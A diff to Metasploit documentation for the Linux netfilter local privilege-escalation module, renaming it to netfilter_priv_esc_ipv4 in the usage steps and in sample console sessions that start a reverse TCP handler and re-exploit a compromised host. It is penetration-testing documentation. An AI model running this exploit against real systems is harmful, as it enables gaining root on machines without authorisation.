@@ -27,7 +27,7 @@ This does not work against the following vulnerable systems. Additional work ma
27
27
28
28
1 . Start msfconsole
29
29
2 . Exploit a box via whatever method
30
- 4 . Do: ` use exploit/linux/local/netfilter_priv_esc `
30
+ 4 . Do: ` use exploit/linux/local/netfilter_priv_esc_ipv4 `
31
31
5 . Do: ` set session # `
32
32
6 . Do: ` set verbose true `
33
33
7 . Do: ` exploit `
@@ -115,7 +115,7 @@ This does not work against the following vulnerable systems. Additional work ma
115
115
116
116
#### Escalate w/ pre-compiled binaries
117
117
118
- msf exploit(netfilter_priv_esc ) > exploit
118
+ msf exploit(netfilter_priv_esc_ipv4 ) > exploit
119
119
120
120
[*] Started reverse TCP handler on 192.168.2.117:4444
121
121
[*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
@@ -160,9 +160,9 @@ This does not work against the following vulnerable systems. Additional work ma
160
160
161
161
In this scenario, we already exploit the box, for whatever reason our shell died. So now we want to re-exploit, but we dont need to run desc again.
162
162
163
- msf exploit(netfilter_priv_esc ) > set reexploit true
163
+ msf exploit(netfilter_priv_esc_ipv4 ) > set reexploit true
164
164
reexploit => true
165
- msf exploit(netfilter_priv_esc ) > exploit
165
+ msf exploit(netfilter_priv_esc_ipv4 ) > exploit
166
166
167
167
[*] Started reverse TCP handler on 192.168.2.117:4444
168
168
[*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
@@ -191,9 +191,9 @@ In this scenario, we already exploit the box, for whatever reason our shell died
191
191
192
192
#### Re-exploit w/ pre-compiled binaries
193
193
194
- msf exploit(netfilter_priv_esc ) > set reexploit true
194
+ msf exploit(netfilter_priv_esc_ipv4 ) > set reexploit true
195
195
reexploit => true
196
- msf exploit(netfilter_priv_esc ) > exploit
196
+ msf exploit(netfilter_priv_esc_ipv4 ) > exploit
197
197
198
198
[*] Started reverse TCP handler on 192.168.2.117:4444
199
199
[*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
0 commit comments